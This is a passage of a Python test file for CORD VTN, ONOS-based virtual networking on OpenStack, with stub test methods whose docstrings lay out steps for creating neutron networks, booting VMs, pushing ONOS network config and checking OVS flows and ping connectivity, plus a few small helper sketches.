nova boot --image 6ba954df-063f-4379-9e2a-920050879918 --flavor 2 --nic port-id=2c7a397f-949e-4502-aa61-2c9cefe96c74 --user-data passwd.data vsg-01
nova boot --image 6ba954df-063f-4379-9e2a-920050879918 --flavor 2 --nic port-id=2c7a397f-949e-4502-aa61-2c9cefe96c74 --user-data passwd.data vsg-02
5) Wait till VMs boot up and running.
6) Verify that two VMs are launched and running by using novaclient python API.
7) Now ping to the VM from other VM which are launched in the public network
8) verify that ping is not successful
9) Verify that flow is being added in ovs-switch in compute-node.
10) Verify that onos-ml2 plugin syncs through ReST call from openstack service neutron.
11) Verify that cord-onos pushed flows to OVS switch.
"""
pass
def test_cordvtn_creating_virtual_public_network_and_boot_2_images_with_invalid_public_field_of_onos_network_cfg_json_in_same_service(self):
"""
Test Method:
1) Validate that required openstack service is up and running.
2) Validate that compute node is being created and get compute node name by using "sudo cord prov list".
3) Push network_cfg.json config file to onos with an invalid public gateway ip in network_cfg.json file.
4) From CORD-Test container, use python-neutron client and create network with name - NetA with an IP as public network.
(neutron net-create net-A-public, neutron subnet-create net-A-public 198.0.0.0/24).
5) Now boot 2 images in the same created network using nova boot image command (example given below :-
$ nova boot --image 3e2d7760-774a-4a16-be07-aaccafa779b6 --flavor 1 --nic net-id=8bc19377-f493-4cad-af23-45fb299da9de net-A-vm-01
$ nova boot --image 3e2d7760-774a-4a16-be07-aaccafa779b6 --flavor 1 --nic net-id=8bc19377-f493-4cad-af23-45fb299da9de net-A-vm-02
6) Wait till VMs boot up and running.
7) Verify that two VMs are launched and running by using novaclient python API.
8) Verify that flow is being added in ovs-switch in compute-node.
9) Verify that onos-ml2 plugin syncs through ReST call from openstack service neutron.
10) Verify that cord-onos pushed flows to OVS switch.
11) Verify ping from the VM to the public gateway which is sent to ONOS through the rest API in the network_cfg.json file.
12) Step 11 should fail because we passed an invalid public IP as gateway, so no flows for it are seen in OVS.
13) Now ping from one VM to the other; it should not ping even though both are in the same service.
"""
pass
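# Hedged sketch of the "push network_cfg.json to onos" step. It assumes the standard
# ONOS REST network-configuration endpoint and the onos/rocks credentials that appear
# elsewhere in this plan; the controller IP is a placeholder.
def sketch_push_network_cfg(onos_ip, cfg_path='network_cfg.json'):
    import json
    import requests

    with open(cfg_path) as f:
        cfg = json.load(f)
    url = 'http://{}:8181/onos/v1/network/configuration'.format(onos_ip)
    resp = requests.post(url, json=cfg, auth=('onos', 'rocks'))
    # ONOS normally answers 200 when the configuration is accepted.
    resp.raise_for_status()
    return resp.status_code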
def test_cordvtn_creating_virtual_local_management_network_and_boot_image_with_invalid_localManagementIp_field_of_onos_network_cfg_json(self):
"""
Test Method:
1) Validate that required openstack service is up and running.
2) Validate that compute node is being created and get compute node name by using "sudo cord prov list".
3) Push network_cfg.json config file to onos with an invalid localManagement ip in network_cfg.json file.
4) From CORD-Test container, use python-neutron client and create network with name - NetA with an IP as local management network.
(neutron net-create net-A-management, neutron subnet-create net-A-management 172.27.0.0/24 -gateway 172.27.0.1).
5) Now boot image in the same created network using nova boot image command (example given below :-
nova boot --image 3e2d7760-774a-4a16-be07-aaccafa779b6 --flavor 1 --nic net-id=8bc19377-f493-4cad-af23-45fb299da9de --nic net-id=8bc19377-f493-4cad-af23-45fb299da9de net-A-vm-01
6) Wait till VM boots up and starts running.
7) Verify that a VM is launched and running by using novaclient python API.
8) Verify that flow is being added in ovs-switch in compute-node.
9) Verify that onos-ml2 plugin syncs through ReST call from openstack service neutron.
10) Verify that cord-onos pushed flows to OVS switch.
11) Verify ping from the VM to the local management IP, which is sent to ONOS through the rest API in the network_cfg.json file.
12) Step 11 should fail because an invalid local management IP was passed, so no flows should be seen in OVS for it.
"""
pass
def test_cordvtn_creating_virtual_private_network_and_boot_image_with_invalid_OVSDB_port_field_of_onos_network_cfg_json(self):
"""
Test Method:
1) Validate that required openstack service is up and running.
2) Validate that compute node is being created and get compute node name by using "sudo cord prov list".
3) Push network_cfg.json config file to onos with an invalid ovsdb port in network_cfg.json file.
4) From CORD-Test container, use python-neutron client and create network with name - NetA with an IP as private network.
(neutron net-create net-A-private, neutron subnet-create net-A-private 10.0.0.0/24).
5) Now boot image in the same created network using nova boot image command (example given below :-
$ nova boot --image 3e2d7760-774a-4a16-be07-aaccafa779b6 --flavor 1 --nic net-id=8bc19377-f493-4cad-af23-45fb299da9de net-A-vm-01
6) Wait till VM boots up and starts running.
7) Verify that a VM is launched and running by using novaclient python API.
8) Verify that flows are being added in ovs-switch in compute-node.
9) Verify that onos-ml2 plugin syncs through ReST call from openstack service neutron.
10) Verify that cord-onos did not push any flows to OVS switch.
"""
pass
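# Hedged sketch of the recurring OVS flow checks (e.g. "verify that cord-onos did not
# push any flows to OVS switch"). It assumes the check runs on the compute node (or is
# wrapped in ssh); the bridge name br-int matches the bridge used later in this plan.
def sketch_count_br_int_flows(bridge='br-int'):
    import subprocess

    out = subprocess.check_output(
        ['ovs-ofctl', '-O', 'OpenFlow13', 'dump-flows', bridge]).decode()
    # Every flow entry contains a cookie field; this skips the reply header line.
    flows = [line for line in out.splitlines() if 'cookie=' in line]
    return len(flows)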
def test_cordvtn_creating_virtual_private_network_and_boot_image_with_invalid_OpenStack_details_in_onos_network_cfg_json(self):
"""
Test Method:
1) Validate that required openstack service is up and running.
2) Validate that compute node is being created and get compute node name by using "sudo cord prov list".
3) Push network_cfg.json config file to onos with invalid openstack details in network_cfg.json file.
4) From CORD-Test container, use python-neutron client and create network with name - NetA with an IP as private network.
(neutron net-create net-A-private, neutron subnet-create net-A-private 10.0.0.0/24).
5) Now boot image in the same created network using nova boot image command (example given below :-
$ nova boot --image 3e2d7760-774a-4a16-be07-aaccafa779b6 --flavor 1 --nic net-id=8bc19377-f493-4cad-af23-45fb299da9de net-A-vm-01
6) Wait till VM boots up and starts running.
7) Verify that a VM is launched and running by using novaclient python API.
8) Verify that no flows are being added in ovs-switch in compute-node.
9) Verify that the onos-ml2 plugin does not receive a message from openstack service neutron.
10) Verify that cord-onos did not push any flows to OVS switch.
"""
pass
def test_cordvtn_creating_virtual_private_network_and_boot_image_with_invalid_compute_node_details_in_onos_network_cfg_json(self):
"""
Test Method:
1) Validate that required openstack service is up and running.
2) Validate that compute node is being created and get compute node name by using "sudo cord prov list".
3) Push network_cfg.json config file to onos with invalid compute node details in network_cfg.json file.
4) From CORD-Test container, use python-neutron client and create network with name - NetA with an IP as private network.
(neutron net-create net-A-private, neutron subnet-create net-A-private 10.0.0.0/24).
5) Now boot image in the same created network using nova boot image command (example given below :-
$ nova boot --image 3e2d7760-774a-4a16-be07-aaccafa779b6 --flavor 1 --nic net-id=8bc19377-f493-4cad-af23-45fb299da9de net-A-vm-01
6) Wait till VM boots up and starts running.
7) Verify that a VM is launched and running by using novaclient python API.
8) Verify that no flows are being added in ovs-switch in compute-node.
9) Verify that the onos-ml2 plugin does not receive a message from openstack service neutron.
10) Verify that cord-onos did not push any flows to OVS switch.
"""
pass
def test_cordvtn_creating_two_virtual_private_networks_and_boot_images_in_different_services_connectivity(self):
"""
Test Method:
1) Validate that required openstack service is up and running.
2) Validate that compute node is being created and get compute node name by using "sudo cord prov list".
3) From CORD-Test container, use python-neutron client and create two networks with name - NetA and NetB with an IP as private network.
(neutron net-create net-A-private, neutron subnet-create net-A-private 10.0.0.0/24).
(neutron net-create net-B-private, neutron subnet-create net-B-private 10.1.0.0/24).
4) Now boot 2 images, one in each created network, using nova boot image command (example given below :-
$ nova boot --image 3e2d7760-774a-4a16-be07-aaccafa779b6 --flavor 1 --nic net-id=8bc19377-f493-4cad-af23-45fb299da9de net-A-vm-01
$ nova boot --image 3e2d7760-774a-4a16-be07-aaccafa779b6 --flavor 1 --nic net-id=8bc19377-f493-4cad-af23-45fb299da9de net-B-vm-01
5) Wait till the VMs boot up and are running.
6) Verify that two VMs are launched and running by using novaclient python API.
7) Verify that flow is being added in ovs-switch in compute-node.
8) Verify that onos-ml2 plugin syncs through ReST call from openstack service neutron.
9) Verify that cord-onos pushed flows to OVS switch.
10) Now ping from the VM in Net-A to the VM in Net-B; it should not ping.
11) Verify that no flows are being added in the OVS switch.
"""
pass
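# Hedged sketch of the "create two private networks NetA and NetB" step with the
# python-neutron client. The names and CIDRs come from the plan above; the helper
# name and the pre-built neutron client argument are illustrative assumptions.
def sketch_create_private_networks(neutron):
    nets = {}
    for name, cidr in [('net-A-private', '10.0.0.0/24'),
                       ('net-B-private', '10.1.0.0/24')]:
        # Equivalent of "neutron net-create <name>" followed by "neutron subnet-create".
        net = neutron.create_network({'network': {'name': name}})['network']
        neutron.create_subnet({'subnet': {'network_id': net['id'],
                                          'cidr': cidr,
                                          'ip_version': 4}})
        nets[name] = net
    return nets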
def test_cordvtn_creating_two_virtual_public_networks_and_boot_images_in_different_service_connectivity(self):
"""
Test Method:
1) Validate that required openstack service is up and running.
2) Validate that compute node is being created and get compute node name by using "sudo cord prov list".
3) From CORD-Test container, use python-neutron client and create two networks with name - NetA and NetB with an IP as public network.
(neutron net-create net-A-public, neutron subnet-create net-A-public 198.0.0.0/24).
(neutron net-create net-B-public, neutron subnet-create net-B-public 198.1.0.0/24).
4) Now boot 2 images, one in each created network, using nova boot image command (example given below :-
$ nova boot --image 3e2d7760-774a-4a16-be07-aaccafa779b6 --flavor 1 --nic net-id=8bc19377-f493-4cad-af23-45fb299da9de net-A-vm-01
$ nova boot --image 3e2d7760-774a-4a16-be07-aaccafa779b6 --flavor 1 --nic net-id=8bc19377-f493-4cad-af23-45fb299da9de net-B-vm-01
5) Wait till the VMs boot up and are running.
6) Verify that two VMs are launched and running by using novaclient python API.
7) Verify that flow is being added in ovs-switch in compute-node.
8) Verify that onos-ml2 plugin syncs through ReST call from openstack service neutron.
9) Verify that cord-onos pushed flows to OVS switch.
10) Now ping from the VM in Net-A to the VM in Net-B; it should not ping.
11) Verify that no flows are being added in the OVS switch.
"""
pass
def test_cordvtn_creating_two_virtual_local_management_networks_and_boot_images_in_different_service_connectivity(self):
"""
Test Method:
1) Validate that required openstack service is up and running.
2) Validate that compute node is being created and get compute node name by using "sudo cord prov list".
3) From CORD-Test container, use python-neutron client and create two networks with name - NetA and NetB with an IP as local management network.
(neutron net-create net-A-management, neutron subnet-create net-A-management 172.27.0.0/24 -gateway 172.27.0.1).
(neutron net-create net-B-management, neutron subnet-create net-B-management 172.28.0.0/24 -gateway 172.28.0.1).
4) Now boot two images, one in each created network, using nova boot image command (example given below :-
nova boot --image 3e2d7760-774a-4a16-be07-aaccafa779b6 --flavor 1 --nic net-id=8bc19377-f493-4cad-af23-45fb299da9de --nic net-id=8bc19377-f493-4cad-af23-45fb299da9de net-A-vm-01
nova boot --image 3e2d7760-774a-4a16-be07-aaccafa779b6 --flavor 1 --nic net-id=8bc19377-f493-4cad-af23-45fb299da9de --nic net-id=8bc19377-f493-4cad-af23-45fb299da9de net-B-vm-01
5) Wait till the VMs boot up and are running.
6) Verify that two VMs are launched and running by using novaclient python API.
7) Verify that flow is being added in ovs-switch in compute-node.
8) Verify that onos-ml2 plugin syncs through ReST call from openstack service neutron.
9) Verify that cord-onos pushed flows to OVS switch.
10) Now ping from the VM in Net-A to the VM in Net-B; it should not ping.
11) Verify that no flows are being added in the OVS switch.
"""
pass
def test_cordvtn_creating_two_virtual_vlan_connectivity_networks_and_boot_images_in_different_service_connectivity(self):
"""
Test Method:
1) Validate that required openstack service is up and running.
2) Validate that compute node is being created and get compute node name by using "sudo cord prov list".
3) From CORD-Test container, use python-neutron client and create two networks with name - NetA and NetB with a vlan port-create.
(neutron port-create net-A-private --name stag-100).
(neutron port-create net-B-private --name stag-200).
4) Now boot two images, one in each created network, using nova boot image command (example given below :-
nova boot --image 6ba954df-063f-4379-9e2a-920050879918 --flavor 2 --nic port-id=2c7a397f-949e-4502-aa61-2c9cefe96c74 --user-data passwd.data vsg-01
nova boot --image 6ba954df-063f-4379-9e2a-920050879918 --flavor 2 --nic port-id=2c7a397f-949e-4502-aa61-2c9cefe96c74 --user-data passwd.data vsg1-01
5) Wait till the VMs boot up and are running.
6) Verify that two VMs are launched and running by using novaclient python API.
7) Verify that flow is being added in ovs-switch in compute-node.
8) Verify that onos-ml2 plugin syncs through ReST call from openstack service neutron.
9) Verify that cord-onos pushed flows to OVS switch.
10) Now ping from the VM in Net-A to the VM in Net-B; it should not ping.
11) Verify that no flows are being added in the OVS switch.
"""
pass
def test_cordvtn_creating_two_virtual_floating_IP_with_vlan_connectivity_networks_and_boot_images_in_different_service_connectivity(self):
"""
Test Method:
1) Validate that required openstack service is up and running.
2) Validate that compute node is being created and get compute node name by using "sudo cord prov list".
3) From CORD-Test container, use python-neutron client and create two networks with name - NetA and NetB with a floating ip and vlan port-create.
(neutron port-create net-A-private --name stag-500).
(neutron port-create net-B-private --name stag-500).
4) Now boot two images, one in each created network, using nova boot image command (example given below :-
nova boot --image 6ba954df-063f-4379-9e2a-920050879918 --flavor 2 --nic port-id=2c7a397f-949e-4502-aa61-2c9cefe96c74 --user-data passwd.data vsg-01
nova boot --image 6ba954df-063f-4379-9e2a-920050879918 --flavor 2 --nic port-id=2c7a397f-949e-4502-aa61-2c9cefe96c74 --user-data passwd.data vsg-02
5) Wait till the VMs boot up and are running.
6) Verify that two VMs are launched and running by using novaclient python API.
7) Verify that flow is being added in ovs-switch in compute-node.
8) Verify that onos-ml2 plugin syncs through ReST call from openstack service neutron.
9) Verify that cord-onos pushed flows to OVS switch.
10) Now ping from the VM in Net-A to the VM in Net-B; it should not ping.
11) Verify that no flows are being added in the OVS switch.
"""
pass
def test_cordvtn_creating_two_virtual_private_networks_and_boot_images_for_services_dependency_with_out_xos_direct_access(self):
"""
Test Method:
1) Validate that required openstack service is up and running.
2) Validate that compute node is being created and get compute node name by using "sudo cord prov list".
3) Push service dependency data.json file to onos to subscriber of other service.
$ curl -X POST -H "Content-Type: application/json" -u onos:rocks -d @data.json http://$OC1:8181/onos/cordvtn/serviceNetworks
4) From CORD-Test container, use python-neutron client and create two networks with names NetA and NetB with an IP as private network.
(neutron net-create net-A-private, neutron subnet-create net-A-private 10.0.0.0/24).
(neutron net-create net-B-private, neutron subnet-create net-B-private 10.1.0.0/24).
5) Now boot 2 images, one in each created network, using nova boot image command (example given below :-
$ nova boot --image 3e2d7760-774a-4a16-be07-aaccafa779b6 --flavor 1 --nic net-id=8bc19377-f493-4cad-af23-45fb299da9de net-A-vm-01
$ nova boot --image 3e2d7760-774a-4a16-be07-aaccafa779b6 --flavor 1 --nic net-id=8bc19377-f493-4cad-af23-45fb299da9de net-B-vm-01
6) Wait till the VMs boot up and are running.
7) Verify that two VMs are launched and running by using novaclient python API.
8) Verify that flow is being added in ovs-switch in compute-node.
9) Verify that onos-ml2 plugin syncs through ReST call from openstack service neutron.
10) Verify that cord-onos pushed flows to OVS switch.
11) Now ping from the VM in Net-A to the VM in Net-B; it should ping.
12) Verify that flows are being added in the OVS switch.
"""
pass
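# Hedged sketch of the "push service dependency data.json" step, mirroring the curl
# command shown above with python-requests. The onos_ip parameter stands in for $OC1;
# credentials and the cordvtn serviceNetworks path are taken from the plan itself.
def sketch_push_service_dependency(onos_ip, data_path='data.json'):
    import json
    import requests

    with open(data_path) as f:
        payload = json.load(f)
    url = 'http://{}:8181/onos/cordvtn/serviceNetworks'.format(onos_ip)
    resp = requests.post(url, json=payload, auth=('onos', 'rocks'))
    resp.raise_for_status()
    return resp.status_code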
def test_cordvtn_creating_two_virtual_private_networks_and_boot_images_for_services_dependency_with_out_xos_indirect_access(self):
"""
Test Method:
1) Validate that required openstack service is up and running.
2) Validate that compute node is being created and get compute node name by using "sudo cord prov list".
3) Push service dependency data.json file to onos to subscriber of other service.
$ curl -X POST -H "Content-Type: application/json" -u onos:rocks -d @data.json http://$OC1:8181/onos/cordvtn/serviceNetworks
4) From CORD-Test container, use python-neutron client and create two networks with names NetA and NetB with an IP as private network.
(neutron net-create net-A-private, neutron subnet-create net-A-private 10.0.0.0/24).
(neutron net-create net-B-private, neutron subnet-create net-B-private 10.1.0.0/24).
5) Now boot 2 images, one in each created network, using nova boot image command (example given below :-
$ nova boot --image 3e2d7760-774a-4a16-be07-aaccafa779b6 --flavor 1 --nic net-id=8bc19377-f493-4cad-af23-45fb299da9de net-A-vm-01
$ nova boot --image 3e2d7760-774a-4a16-be07-aaccafa779b6 --flavor 1 --nic net-id=8bc19377-f493-4cad-af23-45fb299da9de net-B-vm-01
6) Wait till the VMs boot up and are running.
7) Verify that two VMs are launched and running by using novaclient python API.
8) Verify that flow is being added in ovs-switch in compute-node.
9) Verify that onos-ml2 plugin syncs through ReST call from openstack service neutron.
10) Verify that cord-onos pushed flows to OVS switch.
11) Now ping from the VM in Net-B to the VM in Net-A, and capture packets on the port for ICMP request packets.
12) Verify that flows are being added in the OVS switch.
"""
pass
def test_cordvtn_creating_two_virtual_private_networks_and_boot_images_remove_services_dependency_with_out_xos_direct_access(self):
"""
Test Method:
1) Validate that required openstack service is up and running.
2) Validate that compute node is being created and get compute node name by using "sudo cord prov list".
3) Push service dependency data.json file to onos to subscriber of other service.
$ curl -X POST -H "Content-Type: application/json" -u onos:rocks -d @data.json http://$OC1:8181/onos/cordvtn/serviceNetworks
4) From CORD-Test container, use python-neutron client and create two networks with names NetA and NetB with an IP as private network.
(neutron net-create net-A-private, neutron subnet-create net-A-private 10.0.0.0/24).
(neutron net-create net-B-private, neutron subnet-create net-B-private 10.1.0.0/24).
5) Now boot 2 images, one in each created network, using nova boot image command (example given below :-
$ nova boot --image 3e2d7760-774a-4a16-be07-aaccafa779b6 --flavor 1 --nic net-id=8bc19377-f493-4cad-af23-45fb299da9de net-A-vm-01
$ nova boot --image 3e2d7760-774a-4a16-be07-aaccafa779b6 --flavor 1 --nic net-id=8bc19377-f493-4cad-af23-45fb299da9de net-B-vm-01
6) Wait till the VMs boot up and are running.
7) Verify that two VMs are launched and running by using novaclient python API.
8) Verify that flow is being added in ovs-switch in compute-node.
9) Verify that onos-ml2 plugin syncs through ReST call from openstack service neutron.
10) Verify that cord-onos pushed flows to OVS switch.
11) Now ping from the VM in Net-A to the VM in Net-B; it should ping.
12) Verify that flows are being added in the OVS switch.
13) Push config data without the service dependency in the data.json file to onos to the subscriber of the other service.
14) Now ping from the VM in Net-A to the VM in Net-B; it should not ping.
15) Verify that no flows are being added in the OVS switch.
"""
pass
def test_cordvtn_creating_two_virtual_private_networks_and_boot_images_remove_services_dependency_with_out_xos_indirect_access(self):
"""
Test Method:
1) Validate that required openstack service is up and running.
2) Validate that compute node is being created and get compute node name by using "sudo cord prov list".
3) Push service dependency data.json file to onos to subscriber of other service.
$ curl -X POST -H "Content-Type: application/json" -u onos:rocks -d @data.json http://$OC1:8181/onos/cordvtn/serviceNetworks
4) From CORD-Test container, use python-neutron client and create two networks with names NetA and NetB with an IP as private network.
(neutron net-create net-A-private, neutron subnet-create net-A-private 10.0.0.0/24).
(neutron net-create net-B-private, neutron subnet-create net-B-private 10.1.0.0/24).
5) Now boot 2 images, one in each created network, using nova boot image command (example given below :-
$ nova boot --image 3e2d7760-774a-4a16-be07-aaccafa779b6 --flavor 1 --nic net-id=8bc19377-f493-4cad-af23-45fb299da9de net-A-vm-01
$ nova boot --image 3e2d7760-774a-4a16-be07-aaccafa779b6 --flavor 1 --nic net-id=8bc19377-f493-4cad-af23-45fb299da9de net-B-vm-01
6) Wait till the VMs boot up and are running.
7) Verify that two VMs are launched and running by using novaclient python API.
8) Verify that flow is being added in ovs-switch in compute-node.
9) Verify that onos-ml2 plugin syncs through ReST call from openstack service neutron.
10) Verify that cord-onos pushed flows to OVS switch.
11) Now ping from the VM in Net-B to the VM in Net-A, and capture packets on the port for ICMP request packets.
12) Verify that flows are being added in the OVS switch.
13) Push config data without the service dependency in the data.json file to onos to the subscriber of the other service.
14) Now ping from the VM in Net-B to the VM in Net-A; no ICMP request packets should be seen on the port.
15) Verify that no flows are being added in the OVS switch.
"""
pass
def test_cordvtn_creating_two_virtual_private_networks_and_boot_images_for_services_dependency_with_xos_direct_access(self):
"""
Test Method:
1) Validate that required openstack service is up and running.
2) Validate that compute node is being created and get compute node name by using "sudo cord prov list".
3) Validate that XOS is up and running.
4) From CORD-Test container, use python-neutron client and create two networks with names NetA and NetB with an IP as private network.
(neutron net-create net-A-private, neutron subnet-create net-A-private 10.0.0.0/24).
(neutron net-create net-B-private, neutron subnet-create net-B-private 10.1.0.0/24).
5) Now boot 2 images, one in each created network, using nova boot image command (example given below :-
$ nova boot --image 3e2d7760-774a-4a16-be07-aaccafa779b6 --flavor 1 --nic net-id=8bc19377-f493-4cad-af23-45fb299da9de net-A-vm-01
$ nova boot --image 3e2d7760-774a-4a16-be07-aaccafa779b6 --flavor 1 --nic net-id=8bc19377-f493-4cad-af23-45fb299da9de net-B-vm-01
6) Wait till the VMs boot up and are running.
7) Verify that two VMs are launched and running by using novaclient python API.
8) Verify that flow is being added in ovs-switch in compute-node.
9) Verify that onos-ml2 plugin syncs through ReST call from openstack service neutron.
10) Verify that cord-onos pushed flows to OVS switch.
11) Now ping from the VM in Net-A to the VM in Net-B; it should ping.
12) Verify that flows are being added in the OVS switch.
"""
pass
def test_cordvtn_creating_two_virtual_private_networks_and_boot_images_for_services_dependency_with_xos_indirect_access(self):
"""
Test Method:
1) Validate that required openstack service is up and running.
2) Validate that compute node is being created and get compute node name by using "sudo cord prov list".
3) Validate that XOS is up and running.
4) From CORD-Test container, use python-neutron client and create two networks with names NetA and NetB with an IP as private network.
(neutron net-create net-A-private, neutron subnet-create net-A-private 10.0.0.0/24).
(neutron net-create net-B-private, neutron subnet-create net-B-private 10.1.0.0/24).
5) Now boot 2 images, one in each created network, using nova boot image command (example given below :-
$ nova boot --image 3e2d7760-774a-4a16-be07-aaccafa779b6 --flavor 1 --nic net-id=8bc19377-f493-4cad-af23-45fb299da9de net-A-vm-01
$ nova boot --image 3e2d7760-774a-4a16-be07-aaccafa779b6 --flavor 1 --nic net-id=8bc19377-f493-4cad-af23-45fb299da9de net-B-vm-01
6) Wait till the VMs boot up and are running.
7) Verify that two VMs are launched and running by using novaclient python API.
8) Verify that flow is being added in ovs-switch in compute-node.
9) Verify that onos-ml2 plugin syncs through ReST call from openstack service neutron.
10) Verify that cord-onos pushed flows to OVS switch.
11) Now ping from the VM in Net-B to the VM in Net-A; it should ping.
12) Verify that flows are being added in the OVS switch.
"""
pass
def test_cordvtn_with_access_agent_serviceType_and_vtn_location_field_network_cfg_connectivity_to_access_device(self):
"""
Test Method:
1) Validate that required openstack service is up and running.
2) Validate that compute node is being created and get compute node name by using "sudo cord prov list".
3) Push access-agent additional network_cfg to ONOS and specify vtn-location field info must be access-agent container.
4) Launch the access-agent and access-device containers and then restart openstack compute node.
$ sudo docker run --privileged --cap-add=ALL -d --name access-agent -t ubuntu:14.04 /bin/bash
5) Create each interface on br-int and br-mgmt using pipework on access-agent containers
$ sudo ./pipework br-mgmt -i eth1 access-agent 10.10.10.20/24
$ sudo ./pipework br-int -i eth2 access-agent 10.168.0.100/24 fa:00:00:00:00:11
6) We have to stop the ONOS service to test this:
onos-service stop
sudo ovs-ofctl -O OpenFlow13 del-flows br-int "arp"
7) Now attach to access-agent container and ping to access-device
8) Verify that the ping is successful and flows are being added in br-int.
"""
pass
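# Hedged sketch of steps 4-6 of the access-agent setup, driving the docker, pipework
# and ovs-ofctl commands from the plan with subprocess. The relative ./pipework path,
# addresses and MAC come verbatim from the plan; error handling is omitted for brevity.
def sketch_setup_access_agent():
    import subprocess

    cmds = [
        'sudo docker run --privileged --cap-add=ALL -d --name access-agent -t ubuntu:14.04 /bin/bash',
        'sudo ./pipework br-mgmt -i eth1 access-agent 10.10.10.20/24',
        'sudo ./pipework br-int -i eth2 access-agent 10.168.0.100/24 fa:00:00:00:00:11',
        'onos-service stop',
        'sudo ovs-ofctl -O OpenFlow13 del-flows br-int "arp"',
    ]
    for cmd in cmds:
        # Each command is run exactly as it appears in the test plan.
        subprocess.check_call(cmd, shell=True)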
def test_cordvtn_with_access_agent_serviceType_and_vtn_location_field_in_network_cfg_connectivity_to_head_node(self):
"""
Test Method:
1) Validate that required openstack service is up and running.
2) Validate that compute node is being created and get compute node name by using "sudo cord prov list".
3) Push access-agent additional network_cfg to ONOS and specify vtn-location field info must be access-agent container.
4) Launch the access-agent and access-device containers and then restart openstack compute node.
$ sudo docker run --privileged --cap-add=ALL -d --name access-agent -t ubuntu:14.04 /bin/bash
5) Create each interface on br-int and br-mgmt using pipework on access-agent containers
$ sudo ./pipework br-mgmt -i eth1 access-agent 10.10.10.20/24
$ sudo ./pipework br-int -i eth2 access-agent 10.168.0.100/24 fa:00:00:00:00:11
6) We have to stop the ONOS service to test this:
onos-service stop
sudo ovs-ofctl -O OpenFlow13 del-flows br-int "arp"
7) Now attach to access-agent container and ping to head node
8) Verify that the ping is successful and flows are being added in br-int.
"""
pass
def test_cordvtn_with_access_agent_serviceType_and_invalid_vtn_location_field_network_cfg_connectivity_to_access_device(self):
"""
Test Method:
1) Validate that required openstack service is up and running.
2) Validate that compute node is being created and get compute node name by using "sudo cord prov list".
3) Push access-agent additional network_cfg to ONOS and specify vtn-location field info must not be access-agent container.
4) Launch the access-agent and access-device containers and then restart openstack compute node.
$ sudo docker run --privileged --cap-add=ALL -d --name access-agent -t ubuntu:14.04 /bin/bash
5) Create each interface on br-int and br-mgmt using pipework on access-agent containers
$ sudo ./pipework br-mgmt -i eth1 access-agent 10.10.10.20/24
$ sudo ./pipework br-int -i eth2 access-agent 10.168.0.100/24 fa:00:00:00:00:11
6) We have to stop the ONOS service to test this:
onos-service stop
sudo ovs-ofctl -O OpenFlow13 del-flows br-int "arp"
7) Now attach to access-agent container and ping to access-device
8) Verify that the ping is not successful and no flows are being added in br-int.
"""
pass
def test_cordvtn_with_access_agent_serviceType_and_invalid_vtn_location_field_in_network_cfg_connectivity_to_head_node(self):
"""
Test Method:
1) Validate that required openstack service is up and running.
2) Validate that compute node is being created and get compute node name by using "sudo cord prov list".
3) Push access-agent additional network_cfg to ONOS and specify vtn-location field info must not be access-agent container.
4) Launch the access-agent and access-device containers and then restart openstack compute node.
$ sudo docker run --privileged --cap-add=ALL -d --name access-agent -t ubuntu:14.04 /bin/bash
5) Create each interface on br-int and br-mgmt using pipework on access-agent containers
$ sudo ./pipework br-mgmt -i eth1 access-agent 10.10.10.20/24
$ sudo ./pipework br-int -i eth2 access-agent 10.168.0.100/24 fa:00:00:00:00:11
6) We have to stop the ONOS service to test this:
onos-service stop
sudo ovs-ofctl -O OpenFlow13 del-flows br-int "arp"
7) Now attach to access-agent container and ping to head node
8) Verify that the ping is not successful and no flows are being added in br-int.
"""
pass
def test_cordvtn_creating_virtual_private_network_and_boot_2_images_in_same_service_connectivity_after_restarting_VMs(self):
"""
Test Method:
1) Validate that required openstack service is up and running.
2) Validate that compute node is being created and get compute node name by using "sudo cord prov list".
3) From CORD-Test container, use python-neutron client and create network with name - NetA with an IP as private network.
(neutron net-create net-A-private, neutron subnet-create net-A-private 10.0.0.0/24).
4) Now boot 2 images in the same created network using nova boot image command (example given below :-
$ nova boot --image 3e2d7760-774a-4a16-be07-aaccafa779b6 --flavor 1 --nic net-id=8bc19377-f493-4cad-af23-45fb299da9de net-A-vm-01
$ nova boot --image 3e2d7760-774a-4a16-be07-aaccafa779b6 --flavor 1 --nic net-id=8bc19377-f493-4cad-af23-45fb299da9de net-A-vm-02
5) Wait till the VMs boot up and are running.
6) Verify that two VMs are launched and running by using novaclient python API.
7) Now ping one VM from the other VM launched in the same network.
8) Verify that the ping is successful.
9) Verify that flow is being added in ovs-switch in compute-node.
10) Verify that onos-ml2 plugin syncs through ReST call from openstack service neutron.
11) Verify that cord-onos pushed flows to OVS switch.
12) Restart both VMs in same service and repeat steps 7 to 11.
"""
pass
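# Hedged sketch of step 12 (restart both VMs and repeat the connectivity checks) using
# the novaclient python API. The hard reboot, the fixed sleep and the check_ping
# callable are assumptions; the VM names come from the plan above.
def sketch_restart_vms_and_recheck(nova, check_ping,
                                   vm_names=('net-A-vm-01', 'net-A-vm-02')):
    import time

    for name in vm_names:
        server = nova.servers.find(name=name)
        server.reboot(reboot_type='HARD')
    # Give the guests a moment to come back before repeating steps 7 to 11.
    time.sleep(60)
    return check_ping(*vm_names)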
def test_cordvtn_creating_virtual_private_network_and_boot_2_images_in_same_service_connectivity_after_restarting_cord_onos(self):
"""
Test Method:
1) Validate that required openstack service is up and running.
2) Validate that compute node is being created and get compute node name by using "sudo cord prov list".
3) From CORD-Test container, use python-neutron client and create network with name - NetA with an IP as private network.
(neutron net-create net-A-private, neutron subnet-create net-A-private 10.0.0.0/24).
4) Now boot 2 images in the same created network using nova boot image command (example given below :-
$ nova boot --image 3e2d7760-774a-4a16-be07-aaccafa779b6 --flavor 1 --nic net-id=8bc19377-f493-4cad-af23-45fb299da9de net-A-vm-01
$ nova boot --image 3e2d7760-774a-4a16-be07-aaccafa779b6 --flavor 1 --nic net-id=8bc19377-f493-4cad-af23-45fb299da9de net-A-vm-02
5) Wait till the VMs boot up and are running.
6) Verify that two VMs are launched and running by using novaclient python API.
7) Now ping one VM from the other VM launched in the same network.
8) Verify that the ping is successful.
9) Verify that flow is being added in ovs-switch in compute-node.
10) Verify that onos-ml2 plugin syncs through ReST call from openstack service neutron.
11) Verify that cord-onos pushed flows to OVS switch.
12) Restart ONOS service and repeat steps 7 to 11.
"""
pass
def test_cordvtn_creating_virtual_private_network_and_boot_2_images_in_same_service_connectivity_after_delete_any_VM_recreating_it(self):
"""
Test Method:
1) Validate that required openstack service is up and running.
2) Validate that compute node is being created and get compute node name by using "sudo cord prov list".
3) From CORD-Test container, use python-neutron client and create network with name - NetA with an IP as private network.
(neutron net-create net-A-private, neutron subnet-create net-A-private 10.0.0.0/24).
